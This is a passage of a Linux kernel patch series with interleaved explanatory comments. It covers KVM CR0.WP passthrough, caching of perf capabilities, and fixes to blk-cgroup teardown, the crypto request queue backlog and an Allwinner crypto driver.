+ #define PCI_DEVICE_ID_AMD_19H_M70H_DF_F4 0x14f4
++#define PCI_DEVICE_ID_AMD_19H_M78H_DF_F4 0x12fc
+ 
+ /* Protect the PCI config register pairs used for SMN. */
+ static DEFINE_MUTEX(smn_mutex);
+@@ -79,6 +80,7 @@ static const struct pci_device_id amd_nb_misc_ids[] = {
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M50H_DF_F3) },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M60H_DF_F3) },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M70H_DF_F3) },
++	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M78H_DF_F3) },
+ 	{}
+ };
+ 
+diff --git a/arch/x86/kvm/kvm_cache_regs.h b/arch/x86/kvm/kvm_cache_regs.h
+index 3febc342360cc..896cc73949442 100644
+--- a/arch/x86/kvm/kvm_cache_regs.h
++++ b/arch/x86/kvm/kvm_cache_regs.h
+@@ -4,7 +4,7 @@
+ 
+ #include <linux/kvm_host.h>
+ 
+-#define KVM_POSSIBLE_CR0_GUEST_BITS X86_CR0_TS
++#define KVM_POSSIBLE_CR0_GUEST_BITS	(X86_CR0_TS | X86_CR0_WP)
+ #define KVM_POSSIBLE_CR4_GUEST_BITS				  \
+ 	(X86_CR4_PVI | X86_CR4_DE | X86_CR4_PCE | X86_CR4_OSFXSR  \
+ 	 | X86_CR4_OSXMMEXCPT | X86_CR4_PGE | X86_CR4_TSD | X86_CR4_FSGSBASE)
+diff --git a/arch/x86/kvm/mmu.h b/arch/x86/kvm/mmu.h
+index 6bdaacb6faa07..59804be91b5b0 100644
+--- a/arch/x86/kvm/mmu.h
++++ b/arch/x86/kvm/mmu.h
+@@ -113,6 +113,8 @@ void kvm_init_shadow_ept_mmu(struct kvm_vcpu *vcpu, bool execonly,
+ bool kvm_can_do_async_pf(struct kvm_vcpu *vcpu);
+ int kvm_handle_page_fault(struct kvm_vcpu *vcpu, u64 error_code,
+ 				u64 fault_address, char *insn, int insn_len);
++void __kvm_mmu_refresh_passthrough_bits(struct kvm_vcpu *vcpu,
++					struct kvm_mmu *mmu);
+ 
+ int kvm_mmu_load(struct kvm_vcpu *vcpu);
+ void kvm_mmu_unload(struct kvm_vcpu *vcpu);
+@@ -153,6 +155,24 @@ static inline void kvm_mmu_load_pgd(struct kvm_vcpu *vcpu)
+ 					  vcpu->arch.mmu->root_role.level);
+ }
+ 
++static inline void kvm_mmu_refresh_passthrough_bits(struct kvm_vcpu *vcpu,
++						    struct kvm_mmu *mmu)
++{
++	/*
++	 * When EPT is enabled, KVM may passthrough CR0.WP to the guest, i.e.
++	 * @mmu's snapshot of CR0.WP and thus all related paging metadata may
++	 * be stale.  Refresh CR0.WP and the metadata on-demand when checking
++	 * for permission faults.  Exempt nested MMUs, i.e. MMUs for shadowing
++	 * nEPT and nNPT, as CR0.WP is ignored in both cases.  Note, KVM does
++	 * need to refresh nested_mmu, a.k.a. the walker used to translate L2
++	 * GVAs to GPAs, as that "MMU" needs to honor L2's CR0.WP.
++	 */
++	if (!tdp_enabled || mmu == &vcpu->arch.guest_mmu)
++		return;
++
++	__kvm_mmu_refresh_passthrough_bits(vcpu, mmu);
++}
++
+ /*
+  * Check if a given access (described through the I/D, W/R and U/S bits of a
+  * page fault error code pfec) causes a permission fault with the given PTE
+@@ -184,8 +204,12 @@ static inline u8 permission_fault(struct kvm_vcpu *vcpu, struct kvm_mmu *mmu,
+ 	u64 implicit_access = access & PFERR_IMPLICIT_ACCESS;
+ 	bool not_smap = ((rflags & X86_EFLAGS_AC) | implicit_access) == X86_EFLAGS_AC;
+ 	int index = (pfec + (not_smap << PFERR_RSVD_BIT)) >> 1;
+-	bool fault = (mmu->permissions[index] >> pte_access) & 1;
+ 	u32 errcode = PFERR_PRESENT_MASK;
++	bool fault;
++
++	kvm_mmu_refresh_passthrough_bits(vcpu, mmu);
++
++	fault = (mmu->permissions[index] >> pte_access) & 1;
+ 
+ 	WARN_ON(pfec & (PFERR_PK_MASK | PFERR_RSVD_MASK));
+ 	if (unlikely(mmu->pkru_mask)) {
+diff --git a/arch/x86/kvm/mmu/mmu.c b/arch/x86/kvm/mmu/mmu.c
+index b6f96d47e596d..230108a90cf39 100644
+--- a/arch/x86/kvm/mmu/mmu.c
++++ b/arch/x86/kvm/mmu/mmu.c
+@@ -232,6 +232,20 @@ static struct kvm_mmu_role_regs vcpu_to_role_regs(struct kvm_vcpu *vcpu)
+ 	return regs;
+ }
+ 
++static unsigned long get_guest_cr3(struct kvm_vcpu *vcpu)
++{
++	return kvm_read_cr3(vcpu);
++}
++
++static inline unsigned long kvm_mmu_get_guest_pgd(struct kvm_vcpu *vcpu,
++						  struct kvm_mmu *mmu)
++{
++	if (IS_ENABLED(CONFIG_RETPOLINE) && mmu->get_guest_pgd == get_guest_cr3)
++		return kvm_read_cr3(vcpu);
++
++	return mmu->get_guest_pgd(vcpu);
++}
++
+ static inline bool kvm_available_flush_tlb_with_range(void)
+ {
+ 	return kvm_x86_ops.tlb_remote_flush_with_range;
+@@ -3661,7 +3675,7 @@ static int mmu_alloc_shadow_roots(struct kvm_vcpu *vcpu)
+ 	int quadrant, i, r;
+ 	hpa_t root;
+ 
+-	root_pgd = mmu->get_guest_pgd(vcpu);
++	root_pgd = kvm_mmu_get_guest_pgd(vcpu, mmu);
+ 	root_gfn = root_pgd >> PAGE_SHIFT;
+ 
+ 	if (mmu_check_root(vcpu, root_gfn))
+@@ -4112,7 +4126,7 @@ static bool kvm_arch_setup_async_pf(struct kvm_vcpu *vcpu, gpa_t cr2_or_gpa,
+ 	arch.token = alloc_apf_token(vcpu);
+ 	arch.gfn = gfn;
+ 	arch.direct_map = vcpu->arch.mmu->root_role.direct;
+-	arch.cr3 = vcpu->arch.mmu->get_guest_pgd(vcpu);
++	arch.cr3 = kvm_mmu_get_guest_pgd(vcpu, vcpu->arch.mmu);
+ 
+ 	return kvm_setup_async_pf(vcpu, cr2_or_gpa,
+ 				  kvm_vcpu_gfn_to_hva(vcpu, gfn), &arch);
+@@ -4131,7 +4145,7 @@ void kvm_arch_async_page_ready(struct kvm_vcpu *vcpu, struct kvm_async_pf *work)
+ 		return;
+ 
+ 	if (!vcpu->arch.mmu->root_role.direct &&
+-	      work->arch.cr3 != vcpu->arch.mmu->get_guest_pgd(vcpu))
++	      work->arch.cr3 != kvm_mmu_get_guest_pgd(vcpu, vcpu->arch.mmu))
+ 		return;
+ 
+ 	kvm_mmu_do_page_fault(vcpu, work->cr2_or_gpa, 0, true);
+@@ -4488,11 +4502,6 @@ void kvm_mmu_new_pgd(struct kvm_vcpu *vcpu, gpa_t new_pgd)
+ }
+ EXPORT_SYMBOL_GPL(kvm_mmu_new_pgd);
+ 
+-static unsigned long get_cr3(struct kvm_vcpu *vcpu)
+-{
+-	return kvm_read_cr3(vcpu);
+-}
+-
+ static bool sync_mmio_spte(struct kvm_vcpu *vcpu, u64 *sptep, gfn_t gfn,
+ 			   unsigned int access)
+ {
+@@ -4996,6 +5005,21 @@ kvm_calc_cpu_role(struct kvm_vcpu *vcpu, const struct kvm_mmu_role_regs *regs)
+ 	return role;
+ }
+ 
++void __kvm_mmu_refresh_passthrough_bits(struct kvm_vcpu *vcpu,
++					struct kvm_mmu *mmu)
++{
++	const bool cr0_wp = !!kvm_read_cr0_bits(vcpu, X86_CR0_WP);
++
++	BUILD_BUG_ON((KVM_MMU_CR0_ROLE_BITS & KVM_POSSIBLE_CR0_GUEST_BITS) != X86_CR0_WP);
++	BUILD_BUG_ON((KVM_MMU_CR4_ROLE_BITS & KVM_POSSIBLE_CR4_GUEST_BITS));
++
++	if (is_cr0_wp(mmu) == cr0_wp)
++		return;
++
++	mmu->cpu_role.base.cr0_wp = cr0_wp;
++	reset_guest_paging_metadata(vcpu, mmu);
++}
++
+ static inline int kvm_mmu_get_tdp_level(struct kvm_vcpu *vcpu)
+ {
+ 	/* tdp_root_level is architecture forced level, use it if nonzero */
+@@ -5043,7 +5067,7 @@ static void init_kvm_tdp_mmu(struct kvm_vcpu *vcpu,
+ 	context->page_fault = kvm_tdp_page_fault;
+ 	context->sync_page = nonpaging_sync_page;
+ 	context->invlpg = NULL;
+-	context->get_guest_pgd = get_cr3;
++	context->get_guest_pgd = get_guest_cr3;
+ 	context->get_pdptr = kvm_pdptr_read;
+ 	context->inject_page_fault = kvm_inject_page_fault;
+ 
+@@ -5193,7 +5217,7 @@ static void init_kvm_softmmu(struct kvm_vcpu *vcpu,
+ 
+ 	kvm_init_shadow_mmu(vcpu, cpu_role);
+ 
+-	context->get_guest_pgd     = get_cr3;
++	context->get_guest_pgd     = get_guest_cr3;
+ 	context->get_pdptr         = kvm_pdptr_read;
+ 	context->inject_page_fault = kvm_inject_page_fault;
+ }
+@@ -5207,7 +5231,7 @@ static void init_kvm_nested_mmu(struct kvm_vcpu *vcpu,
+ 		return;
+ 
+ 	g_context->cpu_role.as_u64   = new_mode.as_u64;
+-	g_context->get_guest_pgd     = get_cr3;
++	g_context->get_guest_pgd     = get_guest_cr3;
+ 	g_context->get_pdptr         = kvm_pdptr_read;
+ 	g_context->inject_page_fault = kvm_inject_page_fault;
+ 
+diff --git a/arch/x86/kvm/mmu/paging_tmpl.h b/arch/x86/kvm/mmu/paging_tmpl.h
+index 5ab5f94dcb6fd..1f4f5e703f136 100644
+--- a/arch/x86/kvm/mmu/paging_tmpl.h
++++ b/arch/x86/kvm/mmu/paging_tmpl.h
+@@ -324,7 +324,7 @@ static int FNAME(walk_addr_generic)(struct guest_walker *walker,
+ 	trace_kvm_mmu_pagetable_walk(addr, access);
+ retry_walk:
+ 	walker->level = mmu->cpu_role.base.level;
+-	pte           = mmu->get_guest_pgd(vcpu);
++	pte           = kvm_mmu_get_guest_pgd(vcpu, mmu);
+ 	have_ad       = PT_HAVE_ACCESSED_DIRTY(mmu);
+ 
+ #if PTTYPE == 64
+diff --git a/arch/x86/kvm/pmu.c b/arch/x86/kvm/pmu.c
+index de1fd73697365..20cd746cf4678 100644
+--- a/arch/x86/kvm/pmu.c
++++ b/arch/x86/kvm/pmu.c
+@@ -418,9 +418,9 @@ int kvm_pmu_rdpmc(struct kvm_vcpu *vcpu, unsigned idx, u64 *data)
+ 	if (!pmc)
+ 		return 1;
+ 
+-	if (!(kvm_read_cr4(vcpu) & X86_CR4_PCE) &&
++	if (!(kvm_read_cr4_bits(vcpu, X86_CR4_PCE)) &&
+ 	    (static_call(kvm_x86_get_cpl)(vcpu) != 0) &&
+-	    (kvm_read_cr0(vcpu) & X86_CR0_PE))
++	    (kvm_read_cr0_bits(vcpu, X86_CR0_PE)))
+ 		return 1;
+ 
+ 	*data = pmc_read_counter(pmc) & mask;
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index 9599931c7d572..fc1649b5931a4 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -2709,6 +2709,7 @@ static int svm_get_msr_feature(struct kvm_msr_entry *msr)
+ 			msr->data |= MSR_AMD64_DE_CFG_LFENCE_SERIALIZE;
+ 		break;
+ 	case MSR_IA32_PERF_CAPABILITIES:
++		msr->data = kvm_caps.supported_perf_cap;
+ 		return 0;
+ 	default:
+ 		return KVM_MSR_RET_INVALID;
+@@ -4888,6 +4889,7 @@ static __init void svm_set_cpu_caps(void)
+ {
+ 	kvm_set_cpu_caps();
+ 
++	kvm_caps.supported_perf_cap = 0;
+ 	kvm_caps.supported_xss = 0;
+ 
+ 	/* CPUID 0x80000001 and 0x8000000A (SVM features) */
+diff --git a/arch/x86/kvm/vmx/capabilities.h b/arch/x86/kvm/vmx/capabilities.h
+index 07254314f3dd5..cd2ac9536c998 100644
+--- a/arch/x86/kvm/vmx/capabilities.h
++++ b/arch/x86/kvm/vmx/capabilities.h
+@@ -395,30 +395,6 @@ static inline bool vmx_pebs_supported(void)
+ 	return boot_cpu_has(X86_FEATURE_PEBS) && kvm_pmu_cap.pebs_ept;
+ }
+ 
+-static inline u64 vmx_get_perf_capabilities(void)
+-{
+-	u64 perf_cap = PMU_CAP_FW_WRITES;
+-	struct x86_pmu_lbr lbr;
+-	u64 host_perf_cap = 0;
+-
+-	if (!enable_pmu)
+-		return 0;
+-
+-	if (boot_cpu_has(X86_FEATURE_PDCM))
+-		rdmsrl(MSR_IA32_PERF_CAPABILITIES, host_perf_cap);
+-
+-	if (x86_perf_get_lbr(&lbr) >= 0 && lbr.nr)
+-		perf_cap |= host_perf_cap & PMU_CAP_LBR_FMT;
+-
+-	if (vmx_pebs_supported()) {
+-		perf_cap |= host_perf_cap & PERF_CAP_PEBS_MASK;
+-		if ((perf_cap & PERF_CAP_PEBS_FORMAT) < 4)
+-			perf_cap &= ~PERF_CAP_PEBS_BASELINE;
+-	}
+-
+-	return perf_cap;
+-}
+-
+ static inline bool cpu_has_notify_vmexit(void)
+ {
+ 	return vmcs_config.cpu_based_2nd_exec_ctrl &
+diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
+index 8e56ec6e72e9d..9d683b6067c7b 100644
+--- a/arch/x86/kvm/vmx/nested.c
++++ b/arch/x86/kvm/vmx/nested.c
+@@ -4460,7 +4460,7 @@ static void load_vmcs12_host_state(struct kvm_vcpu *vcpu,
+ 	 * CR0_GUEST_HOST_MASK is already set in the original vmcs01
+ 	 * (KVM doesn't change it);
+ 	 */
+-	vcpu->arch.cr0_guest_owned_bits = KVM_POSSIBLE_CR0_GUEST_BITS;
++	vcpu->arch.cr0_guest_owned_bits = vmx_l1_guest_owned_cr0_bits();
+ 	vmx_set_cr0(vcpu, vmcs12->host_cr0);
+ 
+ 	/* Same as above - no reason to call set_cr4_guest_host_mask().  */
+@@ -4611,7 +4611,7 @@ static void nested_vmx_restore_host_state(struct kvm_vcpu *vcpu)
+ 	 */
+ 	vmx_set_efer(vcpu, nested_vmx_get_vmcs01_guest_efer(vmx));
+ 
+-	vcpu->arch.cr0_guest_owned_bits = KVM_POSSIBLE_CR0_GUEST_BITS;
++	vcpu->arch.cr0_guest_owned_bits = vmx_l1_guest_owned_cr0_bits();
+ 	vmx_set_cr0(vcpu, vmcs_readl(CR0_READ_SHADOW));
+ 
+ 	vcpu->arch.cr4_guest_owned_bits = ~vmcs_readl(CR4_GUEST_HOST_MASK);
+diff --git a/arch/x86/kvm/vmx/pmu_intel.c b/arch/x86/kvm/vmx/pmu_intel.c
+index 10b33da9bd058..9fabfe71fd879 100644
+--- a/arch/x86/kvm/vmx/pmu_intel.c
++++ b/arch/x86/kvm/vmx/pmu_intel.c
+@@ -631,7 +631,7 @@ static void intel_pmu_init(struct kvm_vcpu *vcpu)
+ 		pmu->fixed_counters[i].current_config = 0;
+ 	}
+ 
+-	vcpu->arch.perf_capabilities = vmx_get_perf_capabilities();
++	vcpu->arch.perf_capabilities = kvm_caps.supported_perf_cap;
+ 	lbr_desc->records.nr = 0;
+ 	lbr_desc->event = NULL;
+ 	lbr_desc->msr_passthrough = false;
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 4c9116d223df5..07aab85922441 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -1879,7 +1879,7 @@ static int vmx_get_msr_feature(struct kvm_msr_entry *msr)
+ 			return 1;
+ 		return vmx_get_vmx_msr(&vmcs_config.nested, msr->index, &msr->data);
+ 	case MSR_IA32_PERF_CAPABILITIES:
+-		msr->data = vmx_get_perf_capabilities();
++		msr->data = kvm_caps.supported_perf_cap;
+ 		return 0;
+ 	default:
+ 		return KVM_MSR_RET_INVALID;
+@@ -2058,7 +2058,7 @@ static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated
+ 	    (host_initiated || guest_cpuid_has(vcpu, X86_FEATURE_BUS_LOCK_DETECT)))
+ 		debugctl |= DEBUGCTLMSR_BUS_LOCK_DETECT;
+ 
+-	if ((vmx_get_perf_capabilities() & PMU_CAP_LBR_FMT) &&
++	if ((kvm_caps.supported_perf_cap & PMU_CAP_LBR_FMT) &&
+ 	    (host_initiated || intel_pmu_lbr_is_enabled(vcpu)))
+ 		debugctl |= DEBUGCTLMSR_LBR | DEBUGCTLMSR_FREEZE_LBRS_ON_PMI;
+ 
+@@ -2371,14 +2371,14 @@ static int vmx_set_msr(struct kvm_vcpu *vcpu, struct msr_data *msr_info)
+ 			return 1;
+ 		if (data & PMU_CAP_LBR_FMT) {
+ 			if ((data & PMU_CAP_LBR_FMT) !=
+-			    (vmx_get_perf_capabilities() & PMU_CAP_LBR_FMT))
++			    (kvm_caps.supported_perf_cap & PMU_CAP_LBR_FMT))
+ 				return 1;
+ 			if (!cpuid_model_is_consistent(vcpu))
+ 				return 1;
+ 		}
+ 		if (data & PERF_CAP_PEBS_FORMAT) {
+ 			if ((data & PERF_CAP_PEBS_MASK) !=
+-			    (vmx_get_perf_capabilities() & PERF_CAP_PEBS_MASK))
++			    (kvm_caps.supported_perf_cap & PERF_CAP_PEBS_MASK))
+ 				return 1;
+ 			if (!guest_cpuid_has(vcpu, X86_FEATURE_DS))
+ 				return 1;
+@@ -4695,7 +4695,7 @@ static void init_vmcs(struct vcpu_vmx *vmx)
+ 	/* 22.2.1, 20.8.1 */
+ 	vm_entry_controls_set(vmx, vmx_vmentry_ctrl());
+ 
+-	vmx->vcpu.arch.cr0_guest_owned_bits = KVM_POSSIBLE_CR0_GUEST_BITS;
++	vmx->vcpu.arch.cr0_guest_owned_bits = vmx_l1_guest_owned_cr0_bits();
+ 	vmcs_writel(CR0_GUEST_HOST_MASK, ~vmx->vcpu.arch.cr0_guest_owned_bits);
+ 
+ 	set_cr4_guest_host_mask(vmx);
+@@ -5417,7 +5417,7 @@ static int handle_cr(struct kvm_vcpu *vcpu)
+ 		break;
+ 	case 3: /* lmsw */
+ 		val = (exit_qualification >> LMSW_SOURCE_DATA_SHIFT) & 0x0f;
+-		trace_kvm_cr_write(0, (kvm_read_cr0(vcpu) & ~0xful) | val);
++		trace_kvm_cr_write(0, (kvm_read_cr0_bits(vcpu, ~0xful) | val));
+ 		kvm_lmsw(vcpu, val);
+ 
+ 		return kvm_skip_emulated_instruction(vcpu);
+@@ -7496,7 +7496,7 @@ static u8 vmx_get_mt_mask(struct kvm_vcpu *vcpu, gfn_t gfn, bool is_mmio)
+ 	if (!kvm_arch_has_noncoherent_dma(vcpu->kvm))
+ 		return (MTRR_TYPE_WRBACK << VMX_EPT_MT_EPTE_SHIFT) | VMX_EPT_IPAT_BIT;
+ 
+-	if (kvm_read_cr0(vcpu) & X86_CR0_CD) {
++	if (kvm_read_cr0_bits(vcpu, X86_CR0_CD)) {
+ 		if (kvm_check_has_quirk(vcpu->kvm, KVM_X86_QUIRK_CD_NW_CLEARED))
+ 			cache = MTRR_TYPE_WRBACK;
+ 		else
+@@ -7702,6 +7702,33 @@ static void vmx_vcpu_after_set_cpuid(struct kvm_vcpu *vcpu)
+ 	vmx_update_exception_bitmap(vcpu);
+ }
+ 
++static u64 vmx_get_perf_capabilities(void)
++{
++	u64 perf_cap = PMU_CAP_FW_WRITES;
++	struct x86_pmu_lbr lbr;
++	u64 host_perf_cap = 0;
++
++	if (!enable_pmu)
++		return 0;
++
++	if (boot_cpu_has(X86_FEATURE_PDCM))
++		rdmsrl(MSR_IA32_PERF_CAPABILITIES, host_perf_cap);
++
++	if (!cpu_feature_enabled(X86_FEATURE_ARCH_LBR)) {
++		x86_perf_get_lbr(&lbr);
++		if (lbr.nr)
++			perf_cap |= host_perf_cap & PMU_CAP_LBR_FMT;
++	}
++
++	if (vmx_pebs_supported()) {
++		perf_cap |= host_perf_cap & PERF_CAP_PEBS_MASK;
++		if ((perf_cap & PERF_CAP_PEBS_FORMAT) < 4)
++			perf_cap &= ~PERF_CAP_PEBS_BASELINE;
++	}
++
++	return perf_cap;
++}
++
+ static __init void vmx_set_cpu_caps(void)
+ {
+ 	kvm_set_cpu_caps();
+@@ -7724,6 +7751,7 @@ static __init void vmx_set_cpu_caps(void)
+ 
+ 	if (!enable_pmu)
+ 		kvm_cpu_cap_clear(X86_FEATURE_PDCM);
++	kvm_caps.supported_perf_cap = vmx_get_perf_capabilities();
+ 
+ 	if (!enable_sgx) {
+ 		kvm_cpu_cap_clear(X86_FEATURE_SGX);
+diff --git a/arch/x86/kvm/vmx/vmx.h b/arch/x86/kvm/vmx/vmx.h
+index a3da84f4ea456..e2b04f4c0fef3 100644
+--- a/arch/x86/kvm/vmx/vmx.h
++++ b/arch/x86/kvm/vmx/vmx.h
+@@ -640,6 +640,24 @@ BUILD_CONTROLS_SHADOW(tertiary_exec, TERTIARY_VM_EXEC_CONTROL, 64)
+ 				(1 << VCPU_EXREG_EXIT_INFO_1) | \
+ 				(1 << VCPU_EXREG_EXIT_INFO_2))
+ 
++static inline unsigned long vmx_l1_guest_owned_cr0_bits(void)
++{
++	unsigned long bits = KVM_POSSIBLE_CR0_GUEST_BITS;
++
++	/*
++	 * CR0.WP needs to be intercepted when KVM is shadowing legacy paging
++	 * in order to construct shadow PTEs with the correct protections.
++	 * Note!  CR0.WP technically can be passed through to the guest if
++	 * paging is disabled, but checking CR0.PG would generate a cyclical
++	 * dependency of sorts due to forcing the caller to ensure CR0 holds
++	 * the correct value prior to determining which CR0 bits can be owned
++	 * by L1.  Keep it simple and limit the optimization to EPT.
++	 */
++	if (!enable_ept)
++		bits &= ~X86_CR0_WP;
++	return bits;
++}
++
+ static inline struct kvm_vmx *to_kvm_vmx(struct kvm *kvm)
+ {
+ 	return container_of(kvm, struct kvm_vmx, kvm);
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 3463ef7f30196..d7af225b63d89 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -910,6 +910,18 @@ EXPORT_SYMBOL_GPL(load_pdptrs);
+ 
+ void kvm_post_set_cr0(struct kvm_vcpu *vcpu, unsigned long old_cr0, unsigned long cr0)
+ {
++	/*
++	 * CR0.WP is incorporated into the MMU role, but only for non-nested,
++	 * indirect shadow MMUs.  If TDP is enabled, the MMU's metadata needs
++	 * to be updated, e.g. so that emulating guest translations does the
++	 * right thing, but there's no need to unload the root as CR0.WP
++	 * doesn't affect SPTEs.
++	 */
++	if (tdp_enabled && (cr0 ^ old_cr0) == X86_CR0_WP) {
++		kvm_init_mmu(vcpu);
++		return;
++	}
++
+ 	if ((cr0 ^ old_cr0) & X86_CR0_PG) {
+ 		kvm_clear_async_pf_completion_queue(vcpu);
+ 		kvm_async_pf_hash_reset(vcpu);
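Note that the new fast path keys on an exact XOR match: (cr0 ^ old_cr0) == X86_CR0_WP holds only when WP is the one and only bit that changed. A worked example (X86_CR0_WP is bit 16):

/* old = 0x80050033, new = 0x80040033  ->  old ^ new == 0x00010000,
 * so only WP flipped and the cheap kvm_init_mmu() re-derivation runs.
 * Had PG (bit 31) flipped as well, the XOR would also carry bit 31,
 * the equality would fail, and the full handling below would run. */

This is deliberately stricter than testing (cr0 ^ old_cr0) & X86_CR0_WP, which would also match writes that change WP together with bits that do need the heavyweight path.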
+diff --git a/arch/x86/kvm/x86.h b/arch/x86/kvm/x86.h
+index 829d3134c1eb0..9de72586f4065 100644
+--- a/arch/x86/kvm/x86.h
++++ b/arch/x86/kvm/x86.h
+@@ -27,6 +27,7 @@ struct kvm_caps {
+ 	u64 supported_mce_cap;
+ 	u64 supported_xcr0;
+ 	u64 supported_xss;
++	u64 supported_perf_cap;
+ };
+ 
+ void kvm_spurious_fault(void);
+diff --git a/arch/x86/lib/clear_page_64.S b/arch/x86/lib/clear_page_64.S
+index ecbfb4dd3b019..faa4cdc747a3e 100644
+--- a/arch/x86/lib/clear_page_64.S
++++ b/arch/x86/lib/clear_page_64.S
+@@ -142,8 +142,8 @@ SYM_FUNC_START(clear_user_rep_good)
+ 	and $7, %edx
+ 	jz .Lrep_good_exit
+ 
+-.Lrep_good_bytes:
+ 	mov %edx, %ecx
++.Lrep_good_bytes:
+ 	rep stosb
+ 
+ .Lrep_good_exit:
+diff --git a/arch/x86/lib/retpoline.S b/arch/x86/lib/retpoline.S
+index 073289a55f849..841955dc2573d 100644
+--- a/arch/x86/lib/retpoline.S
++++ b/arch/x86/lib/retpoline.S
+@@ -87,8 +87,8 @@ SYM_CODE_END(__x86_indirect_thunk_array)
+  */
+ 	.align 64
+ 	.skip 63, 0xcc
+-SYM_FUNC_START_NOALIGN(zen_untrain_ret);
+-
++SYM_START(zen_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
++	ANNOTATE_NOENDBR
+ 	/*
+ 	 * As executed from zen_untrain_ret, this is:
+ 	 *
+diff --git a/block/blk-cgroup.c b/block/blk-cgroup.c
+index 7c91d9195da8d..60f366f98fa2b 100644
+--- a/block/blk-cgroup.c
++++ b/block/blk-cgroup.c
+@@ -468,6 +468,9 @@ restart:
+ 	list_for_each_entry_safe(blkg, n, &q->blkg_list, q_node) {
+ 		struct blkcg *blkcg = blkg->blkcg;
+ 
++		if (hlist_unhashed(&blkg->blkcg_node))
++			continue;
++
+ 		spin_lock(&blkcg->lock);
+ 		blkg_destroy(blkg);
+ 		spin_unlock(&blkcg->lock);
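The hlist_unhashed() guard works because removing a blkg from its blkcg list with one of the del-init variants leaves the node self-terminated, and hlist_unhashed() is a single pointer test (include/linux/list.h):

static inline int hlist_unhashed(const struct hlist_node *h)
{
	return !h->pprev;
}

So when a concurrent blkcg teardown has already unlinked the blkg, the restart loop above skips it instead of destroying it a second time.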
+diff --git a/crypto/algapi.c b/crypto/algapi.c
+index c72622f20f52b..8c3a869cc43a9 100644
+--- a/crypto/algapi.c
++++ b/crypto/algapi.c
+@@ -944,6 +944,9 @@ EXPORT_SYMBOL_GPL(crypto_enqueue_request);
+ void crypto_enqueue_request_head(struct crypto_queue *queue,
+ 				 struct crypto_async_request *request)
+ {
++	if (unlikely(queue->qlen >= queue->max_qlen))
++		queue->backlog = queue->backlog->prev;
++
+ 	queue->qlen++;
+ 	list_add(&request->list, &queue->list);
+ }
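For context on the backlog adjustment: queue->backlog points at the first request past max_qlen, and everything from there to the tail is backlogged, i.e. its submitter got -EBUSY and is still owed the -EINPROGRESS notification when processing actually starts. Inserting at the head of an already-full queue pushes one more element past the limit, so the boundary must move one node toward the head, which is what backlog = backlog->prev does:

/*
 *   head -> [new][r1][r2] ... [rA][rB] ... -> tail
 *                                  ^ backlog before the insert
 *                             ^ backlog after (rA is now backlogged too)
 */

Without the adjustment, rA would sit beyond the capacity limit yet never be treated as backlogged when the queue drains.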
+diff --git a/crypto/crypto_engine.c b/crypto/crypto_engine.c
+index bb8e77077f020..50bac2ab55f17 100644
+--- a/crypto/crypto_engine.c
++++ b/crypto/crypto_engine.c
+@@ -54,7 +54,7 @@ static void crypto_finalize_request(struct crypto_engine *engine,
+ 		}
+ 	}
+ 	lockdep_assert_in_softirq();
+-	req->complete(req, err);
++	crypto_request_complete(req, err);
+ 
+ 	kthread_queue_work(engine->kworker, &engine->pump_requests);
+ }
+@@ -129,9 +129,6 @@ start_request:
+ 	if (!engine->retry_support)
+ 		engine->cur_req = async_req;
+ 
+-	if (backlog)
+-		backlog->complete(backlog, -EINPROGRESS);
+-
+ 	if (engine->busy)
+ 		was_busy = true;
+ 	else
+@@ -214,9 +211,12 @@ req_err_1:
+ 	}
+ 
+ req_err_2:
+-	async_req->complete(async_req, ret);
++	crypto_request_complete(async_req, ret);
+ 
+ retry:
++	if (backlog)
++		crypto_request_complete(backlog, -EINPROGRESS);
++
+ 	/* If retry mechanism is supported, send new requests to engine */
+ 	if (engine->retry_support) {
+ 		spin_lock_irqsave(&engine->queue_lock, flags);
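Two related changes land in this hunk: completions go through crypto_request_complete() instead of invoking req->complete() directly, and the backlog's -EINPROGRESS notification is deferred until after the current request has completed, so a backlogged request can no longer be told it is in progress before its predecessor's completion callback has run. The wrapper is presumably a one-line indirection of roughly this shape (hedged sketch; the real helper lives in the crypto headers):

static inline void crypto_request_complete(struct crypto_async_request *req,
					   int err)
{
	req->complete(req, err);
}

Funneling every completion through one helper means a later change to the callback's signature only has to touch this function, not every call site.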
+diff --git a/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c b/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c
+index 902f6be057ec6..e97fb203690ae 100644
+--- a/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c
++++ b/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c
+@@ -151,7 +151,7 @@ static int sun8i_ss_setup_ivs(struct skcipher_request *areq)
+ 		}
+ 		rctx->p_iv[i] = a;
+ 		/* we need to setup all others IVs only in the decrypt way */
+-		if (rctx->op_dir & SS_ENCRYPTION)
++		if (rctx->op_dir == SS_ENCRYPTION)
+ 			return 0;
+ 		todo = min(len, sg_dma_len(sg));
+ 		len -= todo;
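The &-to-== change matters if SS_ENCRYPTION is the all-zero encoding of the direction field (an assumption about sun8i-ss.h, consistent with this fix being needed at all): a bitwise AND against zero is always false, so the early return for encryption could never fire and the extra per-chunk IVs were set up for encrypt requests as well.

/* Assuming SS_ENCRYPTION == 0 (hypothetical encoding, for illustration):
 *   rctx->op_dir & SS_ENCRYPTION   -> 0 for both directions, dead test
 *   rctx->op_dir == SS_ENCRYPTION  -> true exactly for encryption
 */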
+diff --git a/drivers/crypto/ccp/psp-dev.c b/drivers/crypto/ccp/psp-dev.c
+index c9c741ac84421..949a3fa0b94a9 100644
